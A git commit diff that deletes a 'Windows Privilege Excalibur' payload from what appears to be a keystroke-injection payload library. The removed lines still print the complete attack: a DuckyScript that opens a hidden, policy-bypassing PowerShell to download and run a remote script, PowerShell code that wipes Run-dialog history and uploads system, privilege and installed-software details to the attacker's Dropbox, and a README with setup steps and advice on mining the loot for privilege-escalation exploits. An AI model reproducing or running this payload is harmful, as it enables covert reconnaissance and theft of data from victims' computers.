Delete payloads/library/exfiltration/Windows-Privilege-Excalibur directory

pull/255/head
Julien Morice 2023-03-13 00:34:01 +01:00 committed by GitHub
parent 2727fc578f
commit ecc2fe1fd8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 0 additions and 127 deletions


@ -1,6 +0,0 @@
#Replace <APP_KEY> with the actual "App Key" of your app.
#Replace <APP_SECRET> with the actual "App Secret" of your app.
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force; Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers @{"Authorization" = "Bearer $((Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers @{"Content-Type" = "application/x-www-form-urlencoded"} -Body @{grant_type = "refresh_token"; refresh_token = "<REFRESH_TOKEN>"; client_id = "<APP_KEY>"; client_secret = "<APP_SECRET>"}).access_token)"; "Content-Type" = "application/octet-stream"; "Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'} -Body "# System Information #`n $(SYSTEMINFO | Out-String) `n# User Information #`n $(WHOAMI /ALL | Out-String) `n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)" | Out-Null


@ -1,57 +0,0 @@
<h1 align="center">
<a href="https://git.io/typing-svg">
<img src="https://readme-typing-svg.herokuapp.com/?lines=Windows+Privilege+Excalibur+🪟🗡️">
</a>
</h1>
## Description
This payload exfiltrates Windows system information, user information (such as privileges), and installed programs from the target computer to Dropbox cloud storage for subsequent privilege escalation analysis. *Only works on Windows 10,11.*
## Usage
### Setup
- **Configure your Dropbox application**
- Create a Dropbox account.
- [Create a Dropbox "App"](https://www.dropbox.com/developers/apps/create) with a "Scoped access" API and a "Full Dropbox" access.
- Go to the settings of this app and write down your "App key" and "App secret".
*These are your "<APP_KEY>" and "<APP_SECRET>".*
- Next, go to the "Permissions" tab and enable the "files.metadata.write" and "files.content.write" permissions.
- After that, open this link in your browser *(values between brackets must be changed)*.
```
https://www.dropbox.com/oauth2/authorize?client_id=<APP_KEY>&token_access_type=offline&response_type=code
```
- Connect your application, allow its permissions, and note the code it gives you.
*This is your "<APP_CODE>".*
- Open a command prompt and run this command *(values between brackets must be changed)*.
```
curl https://api.dropbox.com/oauth2/token -d code=<APP_CODE> -d grant_type=authorization_code -u <APP_KEY>:<APP_SECRET>
```
- Note the "refresh_token" value of the result.
*This is your "<REFRESH_TOKEN>".*
- **Prepare your payload**
- Download the Powershell script ".ps1".
- Modify it to include the <APP_KEY>, <APP_SECRET>, and <REFRESH_TOKEN> of your application.
- Upload your modified ".ps1" file to Dropbox and copy the upload link.
- Replace the end of the link from "?dl=0" to "?dl=1"
*This is your "<DOWNLOAD_LINK>".*
- Download the "payload.txt" file.
- Edit it to include your <DOWNLOAD_LINK>.
### Analysis
Once you have your report file, you can easily scan it for vulnerabilities or misconfigurations that would allow you to elevate your privileges on the target system.
You can use a tool such as [WES-NG](https://github.com/bitsadmin/wesng) to look for missing patches on the system.
You can check if the user has dangerous permissions that can be exploited.
The report also contains a list of software installed on the target computer, which allows you to search for exploits that already exist on this software, via sites such as [Exploit Database](https://www.exploit-db.com) or [Packet Storm](https://packetstormsecurity.com).
---
*This script is for educational purposes only. This script is authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. This author claims no responsibility for unauthorized or unlawful use.*


@ -1,17 +0,0 @@
REM Title: Windows Privilege Excalibur
REM Author: Who-Is-Julien
REM Description: This payload exfiltrates Windows system information and installed programs from the target computer to DropBox cloud storage for subsequent privilege escalation analysis.
REM Target: Windows 10, 11
REM Replace DOWNLOAD_LINK with the actual download link of the script.
DEFINE DOWNLOAD_LINK example.com
DELAY 2000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr
STRING DOWNLOAD_LINK
STRING ; iex $pl
DELAY 500
ENTER


@ -1,47 +0,0 @@
#Replace <APP_KEY> with the actual "App Key" of your app.
#Replace <APP_SECRET> with the actual "App Secret" of your app.
#Replace <REFRESH_TOKEN> with the actual "Refresh Token" of your app.
#Clear windows run dialog history
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "*" -Force
#Define the headers required for the access token request
$headers = @{
"Content-Type" = "application/x-www-form-urlencoded"
}
#Define the parameters for the access token request
$body = @{
grant_type = "refresh_token"
refresh_token = "<REFRESH_TOKEN>"
client_id = "<APP_KEY>"
client_secret = "<APP_SECRET>"
}
#Request an access token from Dropbox using the body and headers defined above
$access_token_response = Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method POST -Headers $headers -Body $body
$access_token = $access_token_response.access_token
#Define headers for the file upload
$headers = @{
"Authorization" = "Bearer $access_token"
"Content-Type" = "application/octet-stream"
"Dropbox-API-Arg" = '{ "path": "/reports/' + $env:computername + '.txt", "mode": "add", "autorename": true, "mute": false }'
}
#Define the report for the file upload
$body = "# System Information #`n $(SYSTEMINFO | Out-String)"
$body += "`n# User Information #`n $(WHOAMI /ALL | Out-String)"
$body += "`n# Installed Programs #`n $(Get-ItemProperty 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\*' | Select-Object DisplayName, DisplayVersion, Publisher | Out-String)"
#Upload the report to Dropbox using the headers and body defined above
Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method POST -Headers $headers -Body $body | Out-Null